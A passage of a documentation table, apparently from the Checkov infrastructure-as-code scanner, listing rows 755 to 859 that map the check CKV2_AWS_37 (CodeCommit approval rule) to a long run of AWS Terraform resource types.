[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 755 | CKV2_AWS_37 | resource | aws_ec2_capacity_reservation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 756 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_authorization_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 757 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 758 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_network_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 759 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 760 | CKV2_AWS_37 | resource | aws_ec2_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 761 | CKV2_AWS_37 | resource | aws_ec2_local_gateway_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 762 | CKV2_AWS_37 | resource | aws_ec2_local_gateway_route_table_vpc_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 763 | CKV2_AWS_37 | resource | aws_ec2_tag | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 764 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 765 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_filter_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 766 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_session | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 767 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 768 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 769 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_peering_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 770 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_peering_attachment_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 771 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 772 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 773 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 774 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table_propagation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 775 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_vpc_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 776 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_vpc_attachment_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 777 | CKV2_AWS_37 | resource | aws_ecr_lifecycle_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 778 | CKV2_AWS_37 | resource | aws_ecr_repository | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 779 | CKV2_AWS_37 | resource | aws_ecr_repository_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 780 | CKV2_AWS_37 | resource | aws_ecs_capacity_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 781 | CKV2_AWS_37 | resource | aws_ecs_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 782 | CKV2_AWS_37 | resource | aws_ecs_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 783 | CKV2_AWS_37 | resource | aws_ecs_task_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 784 | CKV2_AWS_37 | resource | aws_efs_access_point | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 785 | CKV2_AWS_37 | resource | aws_efs_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 786 | CKV2_AWS_37 | resource | aws_efs_file_system_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 787 | CKV2_AWS_37 | resource | aws_efs_mount_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 788 | CKV2_AWS_37 | resource | aws_egress_only_internet_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 789 | CKV2_AWS_37 | resource | aws_eip | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 790 | CKV2_AWS_37 | resource | aws_eip_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 791 | CKV2_AWS_37 | resource | aws_eks_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 792 | CKV2_AWS_37 | resource | aws_eks_fargate_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 793 | CKV2_AWS_37 | resource | aws_eks_node_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 794 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 795 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_application_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 796 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_configuration_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 797 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_environment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 798 | CKV2_AWS_37 | resource | aws_elasticache_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 799 | CKV2_AWS_37 | resource | aws_elasticache_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 800 | CKV2_AWS_37 | resource | aws_elasticache_replication_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 801 | CKV2_AWS_37 | resource | aws_elasticache_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 802 | CKV2_AWS_37 | resource | aws_elasticache_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 803 | CKV2_AWS_37 | resource | aws_elasticsearch_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 804 | CKV2_AWS_37 | resource | aws_elasticsearch_domain_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 805 | CKV2_AWS_37 | resource | aws_elastictranscoder_pipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 806 | CKV2_AWS_37 | resource | aws_elastictranscoder_preset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 807 | CKV2_AWS_37 | resource | aws_elb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 808 | CKV2_AWS_37 | resource | aws_elb_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 809 | CKV2_AWS_37 | resource | aws_emr_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 810 | CKV2_AWS_37 | resource | aws_emr_instance_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 811 | CKV2_AWS_37 | resource | aws_emr_security_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 812 | CKV2_AWS_37 | resource | aws_flow_log | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 813 | CKV2_AWS_37 | resource | aws_fms_admin_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 814 | CKV2_AWS_37 | resource | aws_fsx_lustre_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 815 | CKV2_AWS_37 | resource | aws_fsx_windows_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 816 | CKV2_AWS_37 | resource | aws_gamelift_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 817 | CKV2_AWS_37 | resource | aws_gamelift_build | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 818 | CKV2_AWS_37 | resource | aws_gamelift_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 819 | CKV2_AWS_37 | resource | aws_gamelift_game_session_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 820 | CKV2_AWS_37 | resource | aws_glacier_vault | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 821 | CKV2_AWS_37 | resource | aws_glacier_vault_lock | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 822 | CKV2_AWS_37 | resource | aws_globalaccelerator_accelerator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 823 | CKV2_AWS_37 | resource | aws_globalaccelerator_endpoint_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 824 | CKV2_AWS_37 | resource | aws_globalaccelerator_listener | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 825 | CKV2_AWS_37 | resource | aws_glue_catalog_database | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 826 | CKV2_AWS_37 | resource | aws_glue_catalog_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 827 | CKV2_AWS_37 | resource | aws_glue_classifier | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 828 | CKV2_AWS_37 | resource | aws_glue_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 829 | CKV2_AWS_37 | resource | aws_glue_crawler | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 830 | CKV2_AWS_37 | resource | aws_glue_job | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 831 | CKV2_AWS_37 | resource | aws_glue_security_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 832 | CKV2_AWS_37 | resource | aws_glue_trigger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 833 | CKV2_AWS_37 | resource | aws_glue_workflow | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 834 | CKV2_AWS_37 | resource | aws_guardduty_detector | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 835 | CKV2_AWS_37 | resource | aws_guardduty_invite_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 836 | CKV2_AWS_37 | resource | aws_guardduty_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 837 | CKV2_AWS_37 | resource | aws_guardduty_member | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 838 | CKV2_AWS_37 | resource | aws_guardduty_organization_admin_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 839 | CKV2_AWS_37 | resource | aws_guardduty_organization_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 840 | CKV2_AWS_37 | resource | aws_guardduty_threatintelset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 841 | CKV2_AWS_37 | resource | aws_iam_access_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 842 | CKV2_AWS_37 | resource | aws_iam_account_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 843 | CKV2_AWS_37 | resource | aws_iam_account_password_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 844 | CKV2_AWS_37 | resource | aws_iam_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 845 | CKV2_AWS_37 | resource | aws_iam_group_membership | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 846 | CKV2_AWS_37 | resource | aws_iam_group_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 847 | CKV2_AWS_37 | resource | aws_iam_group_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 848 | CKV2_AWS_37 | resource | aws_iam_instance_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 849 | CKV2_AWS_37 | resource | aws_iam_openid_connect_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 850 | CKV2_AWS_37 | resource | aws_iam_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 851 | CKV2_AWS_37 | resource | aws_iam_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 852 | CKV2_AWS_37 | resource | aws_iam_policy_document | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 853 | CKV2_AWS_37 | resource | aws_iam_role | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 854 | CKV2_AWS_37 | resource | aws_iam_role_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 855 | CKV2_AWS_37 | resource | aws_iam_role_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 856 | CKV2_AWS_37 | resource | aws_iam_saml_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 857 | CKV2_AWS_37 | resource | aws_iam_server_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 858 | CKV2_AWS_37 | resource | aws_iam_service_linked_role | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 859 | CKV2_AWS_37 | resource | aws_iam_user | Ensure CodeCommit associates an approval rule | Terraform | 